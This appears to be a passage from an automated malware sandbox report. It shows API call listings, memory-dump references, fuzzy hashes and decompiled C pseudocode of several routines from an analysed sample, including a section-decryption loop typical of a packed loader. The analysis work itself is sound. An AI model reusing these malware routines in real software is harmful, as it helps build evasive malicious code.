                                                                                                                                                                                                                                                            0x0487910c
                                                                                                                                                                                                                                                            0x04879112
                                                                                                                                                                                                                                                            0x04879117
                                                                                                                                                                                                                                                            0x0487911d
                                                                                                                                                                                                                                                            0x04879124
                                                                                                                                                                                                                                                            0x04879126
                                                                                                                                                                                                                                                            0x04879128
                                                                                                                                                                                                                                                            0x04879137
                                                                                                                                                                                                                                                            0x0487913d
                                                                                                                                                                                                                                                            0x0487913f
                                                                                                                                                                                                                                                            0x04879144
                                                                                                                                                                                                                                                            0x04879174
                                                                                                                                                                                                                                                            0x04879176
                                                                                                                                                                                                                                                            0x04879146
                                                                                                                                                                                                                                                            0x04879146
                                                                                                                                                                                                                                                            0x0487914c
                                                                                                                                                                                                                                                            0x04879159
                                                                                                                                                                                                                                                            0x0487915f
                                                                                                                                                                                                                                                            0x0487915f
                                                                                                                                                                                                                                                            0x04879167
                                                                                                                                                                                                                                                            0x04879170
                                                                                                                                                                                                                                                            0x04879177
                                                                                                                                                                                                                                                            0x04879179
                                                                                                                                                                                                                                                            0x0487917b
                                                                                                                                                                                                                                                            0x04879182
                                                                                                                                                                                                                                                            0x0487918f
                                                                                                                                                                                                                                                            0x04879194
                                                                                                                                                                                                                                                            0x04879199
                                                                                                                                                                                                                                                            0x0487919b
                                                                                                                                                                                                                                                            0x0487919d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487919f
                                                                                                                                                                                                                                                            0x048791a4
                                                                                                                                                                                                                                                            0x048791a6
                                                                                                                                                                                                                                                            0x048791ad
                                                                                                                                                                                                                                                            0x048791b1
                                                                                                                                                                                                                                                            0x048791b4
                                                                                                                                                                                                                                                            0x048791c9
                                                                                                                                                                                                                                                            0x048791cd
                                                                                                                                                                                                                                                            0x048791d2
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048791d2
                                                                                                                                                                                                                                                            0x048791b6
                                                                                                                                                                                                                                                            0x048791b8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048791be
                                                                                                                                                                                                                                                            0x048791c3
                                                                                                                                                                                                                                                            0x048791c5
                                                                                                                                                                                                                                                            0x048791c7
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048791c7
                                                                                                                                                                                                                                                            0x048791aa
                                                                                                                                                                                                                                                            0x048791aa
                                                                                                                                                                                                                                                            0x0487917b
                                                                                                                                                                                                                                                            0x048790b9
                                                                                                                                                                                                                                                            0x048790b9
                                                                                                                                                                                                                                                            0x048790be
                                                                                                                                                                                                                                                            0x048791d4
                                                                                                                                                                                                                                                            0x048791d8
                                                                                                                                                                                                                                                            0x048791e0
                                                                                                                                                                                                                                                            0x048791e0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048791d8
                                                                                                                                                                                                                                                            0x048790c4
                                                                                                                                                                                                                                                            0x048790c7
                                                                                                                                                                                                                                                            0x048790d1
                                                                                                                                                                                                                                                            0x048790d8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048791e8
                                                                                                                                                                                                                                                            0x048791e8
                                                                                                                                                                                                                                                            0x048791ec
                                                                                                                                                                                                                                                            0x048791f0
                                                                                                                                                                                                                                                            0x048791f0

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 04874781: GetModuleHandleA.KERNEL32(4C44544E,00000000,0487902F,00000000,00000000), ref: 04874790
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 048790AC
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 048790FB
                                                                                                                                                                                                                                                            • RtlInitializeCriticalSection.NTDLL(05259570), ref: 0487910C
                                                                                                                                                                                                                                                              • Part of subcall function 04872055: memset.NTDLL ref: 0487206A
                                                                                                                                                                                                                                                              • Part of subcall function 04872055: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 0487209E
                                                                                                                                                                                                                                                              • Part of subcall function 04872055: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 048720A9
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04879137
                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 04879167
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4246211962-0
                                                                                                                                                                                                                                                            • Opcode ID: 756740d742297912ed60fb5112c86f6c00b4b59b02a648fe4edba38c918ef2b3
                                                                                                                                                                                                                                                            • Instruction ID: d8b7f49197d8da2d48781b4a0e1b966690bcee7fa28b48ebbb2f77e55db69255
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 756740d742297912ed60fb5112c86f6c00b4b59b02a648fe4edba38c918ef2b3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A51B7B1A10215ABFB10EBA8D87CA6E77E8EB04754F044E65E601E7180E7B8F9518B61
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(80000002), ref: 048712C6
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(04871973), ref: 04871309
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0487131D
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0487132B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 344208780-0
                                                                                                                                                                                                                                                            • Opcode ID: 890c6f3a6ddf74bbbe72a85b6167bf1d4a7d20361336aa78e510fc82c76702eb
                                                                                                                                                                                                                                                            • Instruction ID: 0e2f4fc1dcc4fe16c3faf1e58b9e1311738b9478dbe07af84f8cf44e8bfba1b5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 890c6f3a6ddf74bbbe72a85b6167bf1d4a7d20361336aa78e510fc82c76702eb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5313BB1900109EF8B05DF9CD4E88AE7BB5FF48300B10892EE54AD7610D779EA85CFA1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                                            			E004015A5(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t77 =  *0x404130;
                                                                                                                                                                                                                                                            				_t39 = E004017BB(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                            				_v16 = _t39;
                                                                                                                                                                                                                                                            				if(_t39 == 0) {
                                                                                                                                                                                                                                                            					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                            					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                            					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                            					_v36 = _t78;
                                                                                                                                                                                                                                                            					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                            					_v24 = _t46;
                                                                                                                                                                                                                                                            					if(_t46 == 0) {
                                                                                                                                                                                                                                                            						_v16 = 8;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t61 = 0;
                                                                                                                                                                                                                                                            						if(_t59 <= 0) {
                                                                                                                                                                                                                                                            							_t47 =  *0x40414c;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t66 = _a4;
                                                                                                                                                                                                                                                            							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                            							_t11 = _t66 + 0x4051a7; // 0x4051a7
                                                                                                                                                                                                                                                            							_v28 = _t50;
                                                                                                                                                                                                                                                            							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                            							_v8 = _t78;
                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                                                            								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                            								_t80 = _t19;
                                                                                                                                                                                                                                                            								E00401C64(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                            								_t64 = _v32;
                                                                                                                                                                                                                                                            								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                            								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                            								_t61 = _t80;
                                                                                                                                                                                                                                                            								 *0x40414c = _t47;
                                                                                                                                                                                                                                                            								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								_t50 = _v28;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                            							_v16 = 0xc;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                            0x004015ac
                                                                                                                                                                                                                                                            0x004015bc
                                                                                                                                                                                                                                                            0x004015c3
                                                                                                                                                                                                                                                            0x004015c6
                                                                                                                                                                                                                                                            0x004015db
                                                                                                                                                                                                                                                            0x004015e2
                                                                                                                                                                                                                                                            0x004015e7
                                                                                                                                                                                                                                                            0x004015f8
                                                                                                                                                                                                                                                            0x004015fb
                                                                                                                                                                                                                                                            0x00401603
                                                                                                                                                                                                                                                            0x00401606
                                                                                                                                                                                                                                                            0x004016b0
                                                                                                                                                                                                                                                            0x0040160c
                                                                                                                                                                                                                                                            0x0040160c
                                                                                                                                                                                                                                                            0x00401610
                                                                                                                                                                                                                                                            0x00401678
                                                                                                                                                                                                                                                            0x00401612
                                                                                                                                                                                                                                                            0x00401612
                                                                                                                                                                                                                                                            0x00401615
                                                                                                                                                                                                                                                            0x00401617
                                                                                                                                                                                                                                                            0x0040161f
                                                                                                                                                                                                                                                            0x00401622
                                                                                                                                                                                                                                                            0x00401625
                                                                                                                                                                                                                                                            0x0040162d
                                                                                                                                                                                                                                                            0x00401635
                                                                                                                                                                                                                                                            0x00401636
                                                                                                                                                                                                                                                            0x00401637
                                                                                                                                                                                                                                                            0x0040163e
                                                                                                                                                                                                                                                            0x0040163e
                                                                                                                                                                                                                                                            0x00401652
                                                                                                                                                                                                                                                            0x00401657
                                                                                                                                                                                                                                                            0x00401660
                                                                                                                                                                                                                                                            0x00401667
                                                                                                                                                                                                                                                            0x0040166a
                                                                                                                                                                                                                                                            0x0040166e
                                                                                                                                                                                                                                                            0x00401673
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040162a
                                                                                                                                                                                                                                                            0x0040162a
                                                                                                                                                                                                                                                            0x00401675
                                                                                                                                                                                                                                                            0x00401682
                                                                                                                                                                                                                                                            0x00401697
                                                                                                                                                                                                                                                            0x00401684
                                                                                                                                                                                                                                                            0x0040168d
                                                                                                                                                                                                                                                            0x00401692
                                                                                                                                                                                                                                                            0x004016a8
                                                                                                                                                                                                                                                            0x004016a8
                                                                                                                                                                                                                                                            0x004016b7
                                                                                                                                                                                                                                                            0x004016bd

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,0040103E,?,00000000,?,?,?,?,?,?,?,0040103E), ref: 004015FB
                                                                                                                                                                                                                                                            • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,0040103E,00000000), ref: 0040168D
                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,0040103E), ref: 004016A8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                            • String ID: Feb 1 2021
                                                                                                                                                                                                                                                            • API String ID: 4010158826-3941213537
                                                                                                                                                                                                                                                            • Opcode ID: de5fea1ad85039e56e897fd73ae1d7c1cf22543670d3d7d9dd1c6b0c0dc25c45
                                                                                                                                                                                                                                                            • Instruction ID: 4fd7a0d3b25dad53608fcb9af1c29b3bbe27065da84e6eb2c7e83f934084680b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de5fea1ad85039e56e897fd73ae1d7c1cf22543670d3d7d9dd1c6b0c0dc25c45
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9315071E001099BDB00CF99CC81AAEBBB9AF48304F148179E904BB295D775AA458B94
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                                            			E04876D20(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                                                            				intOrPtr* _t32;
                                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                                            				int _t46;
                                                                                                                                                                                                                                                            				intOrPtr* _t47;
                                                                                                                                                                                                                                                            				int _t48;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t47 = __eax;
                                                                                                                                                                                                                                                            				_push( &_v12);
                                                                                                                                                                                                                                                            				_push(__eax);
                                                                                                                                                                                                                                                            				_t39 = 0;
                                                                                                                                                                                                                                                            				_t46 = 0; // executed
                                                                                                                                                                                                                                                            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                                            				_v8 = _t26;
                                                                                                                                                                                                                                                            				if(_t26 < 0) {
                                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(_v12 == 0) {
                                                                                                                                                                                                                                                            					Sleep(0xc8);
                                                                                                                                                                                                                                                            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(_v8 >= _t39) {
                                                                                                                                                                                                                                                            					_t28 = _v12;
                                                                                                                                                                                                                                                            					if(_t28 != 0) {
                                                                                                                                                                                                                                                            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                                            						_v8 = _t31;
                                                                                                                                                                                                                                                            						if(_t31 >= 0) {
                                                                                                                                                                                                                                                            							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                                            							if(_t46 != 0) {
                                                                                                                                                                                                                                                            								_t46 = _t46 + 1;
                                                                                                                                                                                                                                                            								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                                            								_t39 = E048716F8(_t48);
                                                                                                                                                                                                                                                            								if(_t39 == 0) {
                                                                                                                                                                                                                                                            									_v8 = 0x8007000e;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            								__imp__#6(_v16);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t32 = _v12;
                                                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					 *_a4 = _t39;
                                                                                                                                                                                                                                                            					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				goto L13;
                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                            0x04876d2c
                                                                                                                                                                                                                                                            0x04876d30
                                                                                                                                                                                                                                                            0x04876d31
                                                                                                                                                                                                                                                            0x04876d32
                                                                                                                                                                                                                                                            0x04876d34
                                                                                                                                                                                                                                                            0x04876d36
                                                                                                                                                                                                                                                            0x04876d3b
                                                                                                                                                                                                                                                            0x04876d3e
                                                                                                                                                                                                                                                            0x04876dd5
                                                                                                                                                                                                                                                            0x04876ddc
                                                                                                                                                                                                                                                            0x04876ddc
                                                                                                                                                                                                                                                            0x04876d47
                                                                                                                                                                                                                                                            0x04876d4e
                                                                                                                                                                                                                                                            0x04876d5e
                                                                                                                                                                                                                                                            0x04876d5e
                                                                                                                                                                                                                                                            0x04876d64
                                                                                                                                                                                                                                                            0x04876d66
                                                                                                                                                                                                                                                            0x04876d6b
                                                                                                                                                                                                                                                            0x04876d74
                                                                                                                                                                                                                                                            0x04876d7c
                                                                                                                                                                                                                                                            0x04876d7f
                                                                                                                                                                                                                                                            0x04876d8a
                                                                                                                                                                                                                                                            0x04876d8e
                                                                                                                                                                                                                                                            0x04876d90
                                                                                                                                                                                                                                                            0x04876d91
                                                                                                                                                                                                                                                            0x04876d9a
                                                                                                                                                                                                                                                            0x04876d9e
                                                                                                                                                                                                                                                            0x04876daf
                                                                                                                                                                                                                                                            0x04876da0
                                                                                                                                                                                                                                                            0x04876da5
                                                                                                                                                                                                                                                            0x04876daa
                                                                                                                                                                                                                                                            0x04876db9
                                                                                                                                                                                                                                                            0x04876db9
                                                                                                                                                                                                                                                            0x04876d8e
                                                                                                                                                                                                                                                            0x04876dbf
                                                                                                                                                                                                                                                            0x04876dc5
                                                                                                                                                                                                                                                            0x04876dc5
                                                                                                                                                                                                                                                            0x04876dce
                                                                                                                                                                                                                                                            0x04876dd3
                                                                                                                                                                                                                                                            0x04876dd3
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1198164300-0
                                                                                                                                                                                                                                                            • Opcode ID: 31a1261dadcf9c7f116c8de7c8de02b580b734235b731ac9b686a8bf24a81db1
                                                                                                                                                                                                                                                            • Instruction ID: 5ad532cd7982f77886cb680c93070695be20df585b8df902c6423649d97af92a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31a1261dadcf9c7f116c8de7c8de02b580b734235b731ac9b686a8bf24a81db1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4217475901609EFCB10EFA8C898DDEBFB8FF49354B148669E805E7204EB71EA00CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                            			E04876A2E(char* __eax) {
                                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                                            				char* _t21;
                                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                                            				char* _t24;
                                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t21 = __eax;
                                                                                                                                                                                                                                                            				_push(0x20);
                                                                                                                                                                                                                                                            				_t23 = 1;
                                                                                                                                                                                                                                                            				_push(__eax);
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					_t8 = StrChrA();
                                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t23 = _t23 + 1;
                                                                                                                                                                                                                                                            					_push(0x20);
                                                                                                                                                                                                                                                            					_push( &(_t8[1]));
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t12 = E048716F8(_t23 << 2);
                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                                                                                                                                                                                            				if(_t12 != 0) {
                                                                                                                                                                                                                                                            					StrTrimA(_t21, 0x487c29c); // executed
                                                                                                                                                                                                                                                            					_t26 = 0;
                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                            						_t24 = StrChrA(_t21, 0x20);
                                                                                                                                                                                                                                                            						if(_t24 != 0) {
                                                                                                                                                                                                                                                            							 *_t24 = 0;
                                                                                                                                                                                                                                                            							_t24 =  &(_t24[1]);
                                                                                                                                                                                                                                                            							StrTrimA(_t24, 0x487c29c);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                                                                                                                                                                                                                            						_t26 = _t26 + 1;
                                                                                                                                                                                                                                                            						_t21 = _t24;
                                                                                                                                                                                                                                                            					} while (_t24 != 0);
                                                                                                                                                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                            0x04876a39
                                                                                                                                                                                                                                                            0x04876a3d
                                                                                                                                                                                                                                                            0x04876a3f
                                                                                                                                                                                                                                                            0x04876a40
                                                                                                                                                                                                                                                            0x04876a48
                                                                                                                                                                                                                                                            0x04876a48
                                                                                                                                                                                                                                                            0x04876a4c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04876a43
                                                                                                                                                                                                                                                            0x04876a44
                                                                                                                                                                                                                                                            0x04876a47
                                                                                                                                                                                                                                                            0x04876a47
                                                                                                                                                                                                                                                            0x04876a54
                                                                                                                                                                                                                                                            0x04876a5b
                                                                                                                                                                                                                                                            0x04876a5f
                                                                                                                                                                                                                                                            0x04876a67
                                                                                                                                                                                                                                                            0x04876a6d
                                                                                                                                                                                                                                                            0x04876a6f
                                                                                                                                                                                                                                                            0x04876a74
                                                                                                                                                                                                                                                            0x04876a78
                                                                                                                                                                                                                                                            0x04876a7a
                                                                                                                                                                                                                                                            0x04876a7d
                                                                                                                                                                                                                                                            0x04876a84
                                                                                                                                                                                                                                                            0x04876a84
                                                                                                                                                                                                                                                            0x04876a8e
                                                                                                                                                                                                                                                            0x04876a91
                                                                                                                                                                                                                                                            0x04876a94
                                                                                                                                                                                                                                                            0x04876a94
                                                                                                                                                                                                                                                            0x04876aa0
                                                                                                                                                                                                                                                            0x04876aa0
                                                                                                                                                                                                                                                            0x04876aad

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • StrChrA.SHLWAPI(?,00000020,00000000,052595AC,?,04879199,?,04872A02,052595AC,?,04879199), ref: 04876A48
                                                                                                                                                                                                                                                            • StrTrimA.KERNELBASE(?,0487C29C,00000002,?,04879199,?,04872A02,052595AC,?,04879199), ref: 04876A67
                                                                                                                                                                                                                                                            • StrChrA.SHLWAPI(?,00000020,?,04879199,?,04872A02,052595AC,?,04879199), ref: 04876A72
                                                                                                                                                                                                                                                            • StrTrimA.SHLWAPI(00000001,0487C29C,?,04879199,?,04872A02,052595AC,?,04879199), ref: 04876A84
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Trim
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3043112668-0
                                                                                                                                                                                                                                                            • Opcode ID: db9d916175eecd2dd378a5a2eba06d5b51e079a4805b8192e523c19f028eb3b6
                                                                                                                                                                                                                                                            • Instruction ID: 08cf942467745dbdd6c6ee2c3e4372b94658ea779b47357929eee89fb2dec5d7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db9d916175eecd2dd378a5a2eba06d5b51e079a4805b8192e523c19f028eb3b6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D901F5316057115FC3209E599C68F27FFD8EF85AA0F110E19F941E7240EB64EC0186A0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E04879D72() {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                                            				WCHAR* _v16;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                            				intOrPtr _t32;
